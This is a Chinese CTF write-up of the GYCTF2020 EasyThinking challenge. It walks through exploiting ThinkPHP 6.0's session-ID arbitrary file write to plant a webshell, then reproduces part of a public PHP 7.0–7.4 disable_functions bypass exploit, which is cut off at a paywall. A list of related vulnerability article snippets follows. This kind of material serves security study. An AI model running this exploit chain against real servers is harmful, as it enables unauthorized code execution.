[GYCTF2020]EasyThinking Thinkphp6.0任意文件操作漏洞 绕过disable_function

最新推荐文章于 2024-04-14 00:09:52 发布
原创 最新推荐文章于 2024-04-14 00:09:52 发布 · 2.5k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #docker #linux

本文详细介绍了如何利用Thinkphp6.0框架的任意文件操作漏洞进行攻击。首先,通过注册并登录,修改Sessionid为php文件名,然后查看session文件内容。接着,通过搜索功能将字符串写入文件,并尝试植入一句话木马。由于存在disable_functions限制,作者找到了绕过的方法,并给出了GitHub上的相关脚本。最后,通过一系列的内存操作技巧,成功触发任意命令执行,获取系统权限。但遗憾的是,未能直接读取flag。此文章深入剖析了Web安全漏洞利用过程,适合安全研究者参考。

[GYCTF2020]EasyThinking
一开始还以为是XSS漏洞,因为搜索记录会被保存。后来查了才知道是Thinkphp 6.0框架的任意文件操作漏洞。先注册一个账号登录,登录时抓包修改Session id为php文件名,长度是32位
在这里插入图片描述
session文件在/runtime/session/目录下,这是默认的。文件名是sess_加我们刚刚写的32位字符串:sess_0123456789012345678901234567.php。
我们可以先来看一下此时这个文件里有什么
在这里插入图片描述
然后我们搜索一下再看这个文件,可以看到我们搜索的字符串是被写进去了。
在这里插入图片描述
把一句话木马写进去,蚁剑连一下。连进去了但是不能读flag,要绕过disable_functions
在这里插入图片描述
github上找绕过的脚本,这老哥真强啊https://github.com/mm0r1/exploits/tree/master/php-filter-bypass
有很多可以用的版本,根据网站的php版本来选好了

<?php

# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)

pwn("/readflag");

function pwn($cmd) {
   
   
    global $abc, $helper, $backtrace;

    class Vuln {
   
   
        public $a;
        public function __destruct() {
   
    
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace(); # ;)
            if(!isset($backtrace[1]['args'])) {
   
    # PHP >= 7.4
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
   
   
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
   
   
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
   
   
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
   
   
        $out = "";
        for ($i=0; $i < $m; $i++) {
   
   
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8</
最低0.47元/天 解锁文章
scrawman
关注
ThinkPHP6.0反序列化漏洞
m0_47968686的博客
01-21 6175
ThinkPHP6.0反序列化漏洞 前言 在学习大师傅们的thinkPHP6.0.x的反序列化漏洞复现文章时,发现自己下载的TP版本是被修复过后的版本。于是更改一下旧链达到RCE。在看本文章前先去看一下上述提到的大师傅的文章。 修补之处 __destruct链触发走的路一样 __toString链最终利用点不同 在旧版本当中,trait Attribute中499行else里面就是最终执行动态函数的地方,所以需要绕过496行的if语句。 但是我复现的时候发现了新版本做了更改即使绕过了496处的if语句在e
ThinkPHP v6.0.x反序列化漏洞复现与分析
m0_61083409的博客
06-18 2316
初始环境,需要注意的是,新版v6基于开发 使用进行安装 坑点,截止到 ,默认核心安装的为 但是到最后面部分代码段已经修复了利用点,所以为了避免大家再次踩坑,请部署完成后,请前往 中,修改核心依赖相关版本,回退更新 进行回退更新,没有出现报错即成功 开启web服务进行验证访问’ 注意:实际测试需要PHP版本>7.2.5**** 版本安装后默认使用单应用模式部署,url访问受到路由模式的影响,为了使用方便,我们先要去 中将 访问控制器中的方法名,并且传递参数值 需要编写一个控制器模块并存在反序列化可控点,这样
thinkphp6.x 反序列化漏洞
weixin_61785633的博客
07-09 1415
thinkphp5.x的反序列化还在贴图片,md文件不能直接沾上来难受,而这个遇到个奇怪的问题,一个代码开始能运行,过段时间居然报错了,不得不说计算机挺玄学的。
ThinkPHP v6.0.7 eval反序列化利用链1
08-03
ThinkPHP v6.0.7 eval反序列化利用链1
ThinkPHP6.0.1_任意文件写入漏洞分析
11-29 1015
ThinkPHP6.0.1_任意文件写入漏洞分析 ThinkPHP6.0.0-ThinkPHP6.0.1 漏洞代码<?php namespace app\controller; use app\BaseController; class Index extends BaseController{ public function index(){ $a = $_GET['a']; $b = $_GET['b']; session($a,$b);
php漏洞搭建复现,ThinkPHP6.0 任意文件操作 漏洞分析复现
weixin_29009501的博客
03-22 1386
一、漏洞简介2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。攻击者可利用此漏洞构造恶意的数据报文,向服务器写入任意内容的文件,从而能够达到远程代码执行.二、影响范围ThinkPHP6.0.0ThinkPHP6...
[GYCTF2020]EasyThinking
feng的博客
01-21 692
知识点 thinkphp6.0.0-6.0.1的任意文件写入 绕过disable_functions WP 很有意思的一道题目,因为自己对于thinkphp实在不了解,也是踩了好多坑才做了出来。 首先进入环境进行简单的信息收集,发现存在www.zip,可以下载源码。下载下来发现是thinkphp6,版本是6.0.0。经过搜索,发现该版本存在任意文件写入,和session有关,参考文章如下: ThinkPHP 6.0.1 漏洞分析(任意文件操作) 对下载下来的源码简单审一下,重点是这个Member.php
buuctf刷题11( | + su -c命令&<?=``;进行rce&tp6.0任意文件操作漏洞&prase_url()函数漏洞)
weixin_63231007的博客
02-06 2266
[羊城杯 2020]Easyphp2 & [红明谷CTF 2021]write_shell & [GYCTF2020]EasyThinking & [N1CTF 2018]eating_cms
GYCTF2020_Writeup
Lethe's Blog
03-15 2790
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
Centos8 via Composer安装Thinkphp6.0两小时亲测有效、一通操作猛如虎,实锤官方文档
Kearney
06-12 1690
简介 ThinkPHP6.0的环境要求如下: PHP >= 7.1.0 6.0版本开始,必须通过Composer方式安装和更新,所以你无法通过Git下载安装。 安装过程 安装Composer curl -sS https://getcomposer.org/installer | php mv composer.phar /usr/local/bin/composer 如果上述安装失败,采用下面的方法 composer config -g repo.packagist composer https
ThinkPHP v6.0.7
04-21
V6.0.7版本发布,本版本主要针对上个版本做了一些路由修正,还意外收获了一些性能提升,是一个建议更新的版本。主要更新 修正Validate类的PHP8兼容性 改进redis驱动的append方法 修正路由匹配检测问题 优化路由变量正则规则生成 改进responseView的内容渲染 安装和更新 V6版本开始仅支持Composer安装及更新,支持上个版本的无缝更新,直接使用composer update 更新到最新版本即可。如果需要全新安装,使用:composer create-project topthink/think tpThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。全面的WEB开发特性支持最新的ThinkPHP为WEB应用开发提供了强有力的支持,这些支持包括:MVC支持-基于多层模型(M)、视图(V)、控制器(C)的设计模式ORM支持-提供了全功能和高性能的ORM支持,支持大部分数据库模板引擎支持-内置了高性能的基于标签库和XML标签的编译型模板引擎RESTFul支持-通过REST控制器扩展提供了RESTFul支持,为你打造全新的URL设计和访问体验云平台支持-提供了对新浪SAE平台和百度BAE平台的强力支持,具备“横跨性”和“平滑性”,支持本地化开发和调试以及部署切换,让你轻松过渡,打造全新的开发体验。CLI支持-支持基于命令行的应用开发RPC支持-提供包括PHPRpc、HProse、jsonRPC和Yar在内远程调用解决方案MongoDb支持-提供NoSQL的支持缓存支持-提供了包括文件、数据库、Memcache、Xcache、Redis等多种类型的缓存支持安全性框架在系统层面提供了众多的安全特性,确保你的网站和产品安全无忧。这些特性包括:XSS安全防护表单自动验证强制数据类型转换输入数据过滤表单令牌验证防SQL注入图像上传检测
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
popepassthru php,一次ThinkPHP引发的bypass_disable_functions
weixin_42522552的博客
03-28 392
查看disable_functions,发现是可爱的宝塔禁用了passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,还有啥是宝塔不能禁的。。。还能怎么办,接着肝,在网上学习了大佬的...
ThinkPHP6 任意文件操作漏洞分析
bylfsj的博客
02-15 2886
公众号:https://mp.weixin.qq.com/s/UPu6cE20l24T6fkYOlSUJw 漏洞介绍 2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。 具体受影响版本为ThinkPHP6.0....
ThinkPHP6.0 反序列化漏洞
Sentiment的博客
05-31 3348
当时学tp就是为了国赛,审了审3和5的寻思已经够用了肯定不能出6的吧就没再审,没想到这次就出了6.012的反序列化还好很简单,所以还是回过头审一遍吧 配置 序言 · ThinkPHP6.0完全开发手册 · 看云 (kancloud.cn) 6.0.1 composer create-project topthink/think tp6.0.1 "require": { "php": ">=7.1.0", "topthink/framework": "6.0.1
[GYCTF2020]EasyThinking【TP6 + disable_functions】
D.MIND 的博客
04-30 641
文章目录TP6 任意文件操作的利用方式:disable_functions的绕过总结:参考: 题目名为:[GYCTF2020]EasyThinking 猜到是考ThinkPHP了,上来可以直接试试www.zip,发现果然有源码泄露 先随便访问一下使页面错误从而查看版本号 是TP6的版本,没审过,继续看看网站上有啥功能,发现可以注册并登录,且有一个搜索功能,搜索的结果可以查看出来,猜测这是一个被利用的功能点 上网搜一下有关TP6漏洞,看到一篇:ThinkPHP6 任意文件操作漏洞分析 这是有关SESSI
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,网络安全开发工程师面试题
最新发布
2401_83947105的博客
04-14 1578
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0
PHP disable_function绕过
goddemon
09-11 825
disable_functions 典型禁用函数 绕过的几个思路 最基础的两个绕法 ①寻找没有被禁用的函数 PHP 中执行命令的函数有-->因此找没有禁用掉的就好了 system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec,mail,putenv,apache_setenv,mb_send_mail,assert,dl,set_time_limit,ignore_user_abort,symlink,link,map_open,imap_m
php enable_dl,【安全红队】PHP绕过disable_function限制
weixin_32025789的博客
03-26 1141
上 利用环境变量和系统组件在维护网站时,为了安全,运维人员会禁用PHP的一些“危险”函数,将其写在 php.ini 配置文件中,就是我们所说的 disable_functions 了。例如:passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值